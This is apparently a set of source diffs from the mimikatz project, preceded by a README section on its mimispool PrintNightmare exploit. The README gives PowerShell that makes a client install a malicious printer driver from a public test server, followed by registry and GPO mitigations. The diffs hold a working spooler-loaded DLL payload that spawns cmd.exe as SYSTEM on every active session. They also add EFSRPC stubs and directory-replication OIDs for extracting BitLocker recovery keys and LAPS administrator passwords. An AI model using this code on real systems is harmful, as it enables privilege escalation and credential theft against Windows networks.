Remove-Printer -Name $printerName
Start-Sleep -Seconds 2
Remove-PrinterDriver -Name 'Generic / Text Only'
Remove-Item -Force -Path ($drivers + '\x64\3\mimispool.dll')
Remove-Item -Force -Path ($drivers + '\W32X86\3\mimispool.dll')
Remove-Item -Force -Path ($system32 + '\mimispool.dll')
```
### Client
#### Any computer with explicit credential to `printnightmare.gentilkiwi.com`
```
$serverName = 'printnightmare.gentilkiwi.com'
$username = 'gentilguest'
$password = 'password'
$printerName = 'Kiwi Legit Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName
$credential = (New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString -AsPlainText -String $password -Force)))
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer' -ErrorAction SilentlyContinue
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
New-PSDrive -Name 'KiwiLegitPrintServer' -Root ('\\' + $serverName + '\print$') -PSProvider FileSystem -Credential $credential | Out-Null
Add-Printer -ConnectionName $fullprinterName
$driver = (Get-Printer -Name $fullprinterName).DriverName
Remove-Printer -Name $fullprinterName
Remove-PrinterDriver -Name $driver
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer'
# mimispool still in spool\drivers
```
#### Computer in domain (single sign on with current user to print server)
```
$serverName = 'print.lab.local'
$printerName = 'Kiwi Legit Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName
$driver = (Get-Printer -Name $fullprinterName).DriverName
Remove-Printer -Name $fullprinterName
Remove-PrinterDriver -Name $driver
# mimispool still in spool\drivers
```
## Protect
_to adapt to your environment_
**Please, do not set `RestrictDriverInstallationToAdministrators` to `0` without these settings**
### Registry
#### `.reg` file
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
"PackagePointAndPrintOnly"=dword:00000001
"PackagePointAndPrintServerList"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
"1"="/your really legit servers or invalid entry !/"
```
#### commands
```
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v 1 /t REG_SZ /d "/your really legit servers or invalid entry !/"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
```
### Registry with real printer servers and allowing non-administrators to install package P&P drivers & printers
#### `.reg` file
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
"PackagePointAndPrintOnly"=dword:00000001
"PackagePointAndPrintServerList"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
"srv1.fqdn"="srv1.fqdn"
"srv2.fqdn"="srv2.fqdn"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint]
"RestrictDriverInstallationToAdministrators"=dword:00000000
```
#### commands
```
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv1.fqdn" /t REG_SZ /d "srv1.fqdn"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv2.fqdn" /t REG_SZ /d "srv2.fqdn"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0
```
### GPO / Local
In `Computer Configuration`, `Administrative Templates`, `Printers`, enable:
- `Only use Package Point and Print`
- `Package Point and Print - Approved servers`
![image](https://user-images.githubusercontent.com/2307945/129240741-b2a0ba14-6858-4c3f-ad07-07fa55efca29.png)
### GPO with real printer servers and allowing non-administrators to install package P&P drivers & printers
Same configuration as previously - _with real printer server names this time_ - but do not forget to add registry key `RestrictDriverInstallationToAdministrators` to `0`
![image](https://user-images.githubusercontent.com/2307945/133833820-a66b3ffd-a3aa-43a2-a1bf-14581a2a7492.png)

View File

@ -5,48 +5,36 @@
*/
#include "mimispool.h"
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
BOOL ret = TRUE;
switch( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH:
kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH");
ret = FALSE;
// FALSE avoid to keep library in memory (PrintNightmare < 3/4)
// TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*)
break;
UNREFERENCED_PARAMETER(hinstDLL);
UNREFERENCED_PARAMETER(lpReserved);
case DLL_THREAD_ATTACH:
kspool(TEXT(__FUNCTION__) L"-THREAD_ATTACH");
break;
if (fdwReason == DLL_PROCESS_ATTACH)
{
RunProcessForAll(L"cmd.exe");
}
case DLL_THREAD_DETACH:
kspool(TEXT(__FUNCTION__) L"-THREAD_DETACH");
break;
case DLL_PROCESS_DETACH:
kspool(TEXT(__FUNCTION__) L"-PROCESS_DETACH");
break;
}
return ret;
return TRUE;
}
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
// PrintNightMare 2.x - via config file and/or "real driver"
VOID APIENTRY DrvResetConfigCache()
{
;
}
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
{
BOOL status = FALSE;
kspool(TEXT(__FUNCTION__));
if ( dwMode == DRVQUERY_USERMODE)
if (dwMode == DRVQUERY_USERMODE)
{
*pcbNeeded = sizeof(DWORD);
if (pBuffer && (cbBuf >= sizeof(DWORD)))
{
status = TRUE;
*(DWORD *)pBuffer = TRUE;
*(DWORD*)pBuffer = TRUE;
}
SetLastError(ERROR_INSUFFICIENT_BUFFER);
}
@ -58,13 +46,11 @@ BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbB
return status;
}
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pded)
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
{
BOOL status = FALSE;
kspool(TEXT(__FUNCTION__));
if((iEngineVersion < 0x20000) || (cj < 0x10))
if ((iEngineVersion < 0x20000) || (cj < 0x10))
{
SetLastError(ERROR_BAD_DRIVER_LEVEL);
}
@ -81,50 +67,83 @@ BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pde
VOID APIENTRY DrvDisableDriver()
{
kspool(TEXT(__FUNCTION__));
;
}
VOID APIENTRY DrvResetConfigCache()
{
kspool(TEXT(__FUNCTION__));
}
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
void kspool(LPCWSTR szFrom)
// PrintNightMare 4.x - via CopyFiles
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
{
FILE * kspool_logfile;
WCHAR Buffer[256 + 1];
DWORD cbBuffer = ARRAYSIZE(Buffer);
#pragma warning(push)
#pragma warning(disable:4996)
if(kspool_logfile = _wfopen(L"mimispool.log", L"a"))
#pragma warning(pop)
{
klog(kspool_logfile, L"[" PLATFORM L"] [%s] as \'%s\'\n", szFrom, GetUserName(Buffer, &cbBuffer) ? Buffer : L"-");
fclose(kspool_logfile);
}
}
void klog(FILE * logfile, PCWCHAR format, ...)
{
if(logfile)
{
va_list args;
va_start(args, format);
vfwprintf(logfile, format, args);
va_end(args);
fflush(logfile);
}
}
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
{
kspool(TEXT(__FUNCTION__));
UNREFERENCED_PARAMETER(pszPrinterName);
UNREFERENCED_PARAMETER(pszDirectory);
UNREFERENCED_PARAMETER(pSplClientInfo);
UNREFERENCED_PARAMETER(dwLevel);
UNREFERENCED_PARAMETER(pszSourceDir);
UNREFERENCED_PARAMETER(pcchSourceDirSize);
UNREFERENCED_PARAMETER(pszTargetDir);
UNREFERENCED_PARAMETER(pcchTargetDirSize);
UNREFERENCED_PARAMETER(dwFlags);
return ERROR_SUCCESS;
}
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
{
kspool(TEXT(__FUNCTION__));
UNREFERENCED_PARAMETER(pszPrinterName);
UNREFERENCED_PARAMETER(pszKey);
UNREFERENCED_PARAMETER(dwCopyFileEvent);
return TRUE;
}
// Kiwi payload - SYSTEM on all active desktop(s)
BOOL RunProcessForAll(LPWSTR szProcess)
{
BOOL status = FALSE;
STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
HANDLE hToken, hNewToken;
DWORD i, count;
LPVOID Environment;
PSESSIONIDW sessions;
si.cb = sizeof(si);
si.lpDesktop = L"winsta0\\default";
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
{
if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
{
if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
{
for (i = 0; i < count; i++)
{
if (sessions[i].State == State_Active)
{
if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
{
if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
}
}
}
if (sessions)
{
WinStationFreeMemory(sessions);
}
}
DestroyEnvironmentBlock(Environment);
}
CloseHandle(hNewToken);
}
CloseHandle(hToken);
}
return status;
}

View File

@ -1,10 +1,11 @@
LIBRARY
EXPORTS
; PrintNightMare 2.x - via config file and/or "real driver"
DrvResetConfigCache
DrvQueryDriverInfo
DrvEnableDriver
DrvDisableDriver
DrvResetConfigCache
; PrintNightMare 4.x - via CopyFiles
GenerateCopyFilePaths
SpoolerCopyFileEvent

View File

@ -5,35 +5,75 @@
*/
#pragma once
#include <windows.h>
#include <stdio.h>
#include <userenv.h>
#if defined(_M_X64) || defined(_M_ARM64) // to do, for real one day
#define PLATFORM L"x64"
#elif defined(_M_IX86)
#define PLATFORM L"x86"
#endif
//__pragma(comment(linker, "/export:DllCanUnloadNow=KyXPUI_orig.DllCanUnloadNow,PRIVATE"))
//__pragma(comment(linker, "/export:DllGetClassObject=KyXPUI_orig.DllGetClassObject,PRIVATE"))
typedef LONG_PTR (APIENTRY *PFN)();
#define LOGONID_CURRENT ((ULONG) -1)
#define SERVERHANDLE_CURRENT ((HANDLE) NULL)
#define MAX_THINWIRECACHE 4
#define WINSTATIONNAME_LENGTH 32
#define DOMAIN_LENGTH 17
#define USERNAME_LENGTH 20
typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
typedef enum _WINSTATIONSTATECLASS {
State_Active = 0,
State_Connected = 1,
State_ConnectQuery = 2,
State_Shadow = 3,
State_Disconnected = 4,
State_Idle = 5,
State_Listen = 6,
State_Reset = 7,
State_Down = 8,
State_Init = 9
} WINSTATIONSTATECLASS;
#pragma warning(push)
#pragma warning(disable:4201)
typedef struct _SESSIONIDW {
union {
ULONG SessionId;
ULONG LogonId;
} DUMMYUNIONNAME;
WINSTATIONNAME WinStationName;
WINSTATIONSTATECLASS State;
} SESSIONIDW, * PSESSIONIDW;
#pragma warning(pop)
BOOLEAN WINAPI WinStationEnumerateW(IN HANDLE hServer, OUT PSESSIONIDW* SessionIds, OUT PULONG Count);
BOOLEAN WINAPI WinStationFreeMemory(IN PVOID Buffer);
typedef LONG_PTR(APIENTRY* PFN)();
typedef struct _DRVFN {
ULONG iFunc;
PFN pfn;
} DRVFN, *PDRVFN;
} DRVFN, * PDRVFN;
typedef struct tagDRVENABLEDATA {
ULONG iDriverVersion;
ULONG c;
DRVFN *pdrvfn;
} DRVENABLEDATA, *PDRVENABLEDATA;
DRVFN* pdrvfn;
} DRVENABLEDATA, * PDRVENABLEDATA;
#define DRVQUERY_USERMODE 1
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, __out_bcount(cbBuf) PVOID pBuffer, DWORD cbBuf, __out_ecount(1) PDWORD pcbNeeded);
__control_entrypoint(DeviceDriver) BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, __in_bcount(cj) DRVENABLEDATA *pded);
VOID APIENTRY DrvDisableDriver();
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved);
void kspool(LPCWSTR szFrom);
void klog(FILE * logfile, PCWCHAR format, ...);
// PrintNightMare 2.x - via config file and/or "real driver"
VOID APIENTRY DrvResetConfigCache();
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded);
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
VOID APIENTRY DrvDisableDriver();
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
// PrintNightMare 4.x - via CopyFiles
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags);
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent);
// Kiwi payload - SYSTEM on all active desktop(s)
BOOL RunProcessForAll(LPWSTR szProcess);

View File

@ -79,7 +79,7 @@
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AssemblyDebug>false</AssemblyDebug>
<AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>advapi32.lib;userenv.lib;winsta.lib;%(AdditionalDependencies)</AdditionalDependencies>
<DataExecutionPrevention>true</DataExecutionPrevention>
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
@ -100,5 +100,6 @@
</ItemGroup>
<ItemGroup>
<None Include="mimispool.def" />
<None Include="README.md" />
</ItemGroup>
</Project>

View File

@ -11,5 +11,6 @@
</ItemGroup>
<ItemGroup>
<None Include="mimispool.def" />
<None Include="README.md" />
</ItemGroup>
</Project>

View File

@ -5,7 +5,7 @@
*/
#include "kull_m_ldap.h"
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn)
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity)
{
BOOL status = FALSE;
DWORD dwErr;
@ -14,7 +14,7 @@ BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR
{
if(*rootDn = kull_m_ldap_getRootDomainNamingContext(nc, *ld))
{
dwErr = ldap_bind_s(*ld, NULL, NULL, LDAP_AUTH_NEGOTIATE);
dwErr = ldap_bind_s(*ld, NULL, (PWCHAR) pIdentity, LDAP_AUTH_NEGOTIATE);
status = (dwErr == LDAP_SUCCESS);
if(!status)
{

View File

@ -9,5 +9,5 @@
#include <WinBer.h>
#include "kull_m_string.h"
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn);
BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity);
PWCHAR kull_m_ldap_getRootDomainNamingContext(PCWCHAR nc, LDAP *ld);

View File

@ -230,6 +230,7 @@ BOOL kull_m_memory_alloc(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T Lenght, IN
kull_m_kernel_ioctl_handle(Address->hMemory->pHandleDriver->hDriver, IOCTL_MIMIDRV_VM_ALLOC, NULL, (DWORD) Lenght, &ptrAddress, &lenPtr, FALSE);
break;
default:
SetLastError(ERROR_NOT_SUPPORTED);
break;
}
return (Address->address) != NULL;

View File

@ -211,6 +211,4 @@ NET_API_STATUS NET_API_FUNCTION NetWkstaUserEnum(IN LMSTR servername, IN DWORD l
NET_API_STATUS NET_API_FUNCTION NetShareEnum(IN LMSTR servername, IN DWORD level, OUT LPBYTE *bufptr, IN DWORD prefmaxlen, OUT LPDWORD entriesread, OUT LPDWORD totalentries, IN OUT LPDWORD resume_handle);
NET_API_STATUS NET_API_FUNCTION NetStatisticsGet(IN LPWSTR server, IN LPWSTR service, IN DWORD level, IN DWORD options, OUT LPBYTE *bufptr);
NET_API_STATUS NET_API_FUNCTION NetRemoteTOD(IN LPCWSTR UncServerName, OUT PTIME_OF_DAY_INFO *pToD);
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);
NET_API_STATUS NET_API_FUNCTION NetShareAdd(IN LMSTR servername, IN DWORD level, IN LPBYTE buf, OUT LPDWORD parm_err);
NET_API_STATUS NET_API_FUNCTION NetConnectionEnum(IN LMSTR servername, LMSTR qualifier, DWORD level, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle);
NET_API_STATUS NET_API_FUNCTION NetServerGetInfo(IN LPWSTR servername, IN DWORD level, OUT LPBYTE *bufptr);

View File

@ -22,6 +22,8 @@
#include "../kull_m_crypto.h"
#include "../kull_m_process.h"
#define NDR_TSI_20 { {0x8a885d04, 0x1ceb, 0x11c9, { 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 }}, { 2, 0 }}
typedef DWORD NET_API_STATUS;
typedef UNICODE_STRING RPC_UNICODE_STRING;

View File

@ -550,7 +550,9 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
{
oidPrefix.length -= (lastValue < 0x80) ? 1 : 2;
if(status = kull_m_rpc_drsr_MakeAttid_addPrefixToTable(prefixTable, &oidPrefix, &ndx, toAdd))
{
*att |= ndx << 16;
}
else PRINT_ERROR(L"kull_m_rpc_drsr_MakeAttid_addPrefixToTable\n");
kull_m_asn1_freeEnc(oidPrefix.value);
}
@ -559,23 +561,32 @@ BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, A
return status;
}
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type)
{
ATTRVALBLOCK *ptr = NULL;
DWORD i;
ATTR *attribut;
for(i = 0; i < attributes->attrCount; i++)
{
attribut = &attributes->pAttr[i];
if(attribut->attrTyp == type)
{
ptr = &attribut->AttrVal;
break;
}
}
return ptr;
}
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
{
ATTRVALBLOCK *ptr = NULL;
ATTRTYP type;
if(kull_m_rpc_drsr_MakeAttid(prefixTable, szOid, &type, FALSE))
{
for(i = 0; i < attributes->attrCount; i++)
{
attribut = &attributes->pAttr[i];
if(attribut->attrTyp == type)
{
ptr = &attribut->AttrVal;
break;
}
}
ptr = kull_m_rpc_drsr_findAttrNoOID(attributes, type);
}
else PRINT_ERROR(L"Unable to get an ATTRTYP for %S\n", szOid);
return ptr;
@ -605,6 +616,31 @@ PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *
return ptr;
}
PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size)
{
PVOID ptr = NULL;
ATTRVALBLOCK *valblock;
if(data)
*(PVOID *)data = NULL;
if(size)
*size = 0;
if(valblock = kull_m_rpc_drsr_findAttrNoOID(attributes, type))
{
if(valblock->valCount == 1)
{
ptr = valblock->pAVal[0].pVal;
if(data)
*(PVOID *)data = ptr;
if(size)
*size = valblock->pAVal[0].valLen;
}
}
return ptr;
}
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine)
{
PVOID ptr;

View File

@ -188,6 +188,16 @@ typedef enum {
#define szOID_ANSI_lmPwdHistory "1.2.840.113556.1.4.160"
#define szOID_ANSI_supplementalCredentials "1.2.840.113556.1.4.125"
// bitlocker
#define szOID_ANSI_msFVERecoveryPassword "1.2.840.113556.1.4.1964"
#define szOID_ANSI_msFVERecoveryGuid "1.2.840.113556.1.4.1965"
#define szOID_ANSI_msFVEVolumeGuid "1.2.840.113556.1.4.1998"
#define szOID_ANSI_msFVEKeyPackage "1.2.840.113556.1.4.1999"
// LAPS
#define szOID_ANSI_msMcsAdmPwd "1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.1"
#define szOID_ANSI_msMcsAdmPwdExpirationTime "1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.2"
#define szOID_ANSI_trustPartner "1.2.840.113556.1.4.133"
#define szOID_ANSI_trustAuthIncoming "1.2.840.113556.1.4.129"
#define szOID_ANSI_trustAuthOutgoing "1.2.840.113556.1.4.135"
@ -257,8 +267,10 @@ void kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(SCHEMA_PREFIX_TABLE *prefixTa
LPSTR kull_m_rpc_drsr_OidFromAttid(SCHEMA_PREFIX_TABLE *prefixTable, ATTRTYP type);
BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, ATTRTYP *att, BOOL toAdd);
ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type);
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid);
PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, PVOID data, DWORD *size);
PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size);
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine);
LPWSTR kull_m_rpc_drsr_MakeSpnWithGUID(LPCGUID ServClass, LPCWSTR ServName, LPCGUID InstName);

View File

@ -1,11 +1,27 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "kull_m_rpc.h"
const UUID EFSR_ObjectUUID;
extern const UUID EFSR_ObjectUUID;
typedef void *PEXIMPORT_CONTEXT_HANDLE;
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags);
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext);
typedef struct pipe_EFS_EXIM_PIPE {
void (__RPC_USER* pull) (CHAR* state, UCHAR* buf, ULONG esize, ULONG* ecount);
void (__RPC_USER* push) (CHAR* state, UCHAR* buf, ULONG ecount);
void (__RPC_USER* alloc) (CHAR* state, ULONG bsize, UCHAR** buf, ULONG* bcount);
char* state;
} EFS_EXIM_PIPE;
extern RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags);
long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe);
long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe);
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext);
long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName);
long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag);
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;

View File

@ -1,75 +1,104 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc_ms-efsr.h"
const UUID EFSR_ObjectUUID = {0xdf1941c5, 0xfe89, 0x4e79, {0xbf, 0x10, 0x46, 0x36, 0x57, 0xac, 0xf4, 0x4d}};
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
SHORT Pad;
UCHAR Format[23];
} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
SHORT Pad;
UCHAR Format[93];
} ms2Defsr_MIDL_PROC_FORMAT_STRING;
extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
{
return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], binding_h, hContext, FileName, Flags).Simple;
}
void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
{
NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[54], hContext);
}
static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
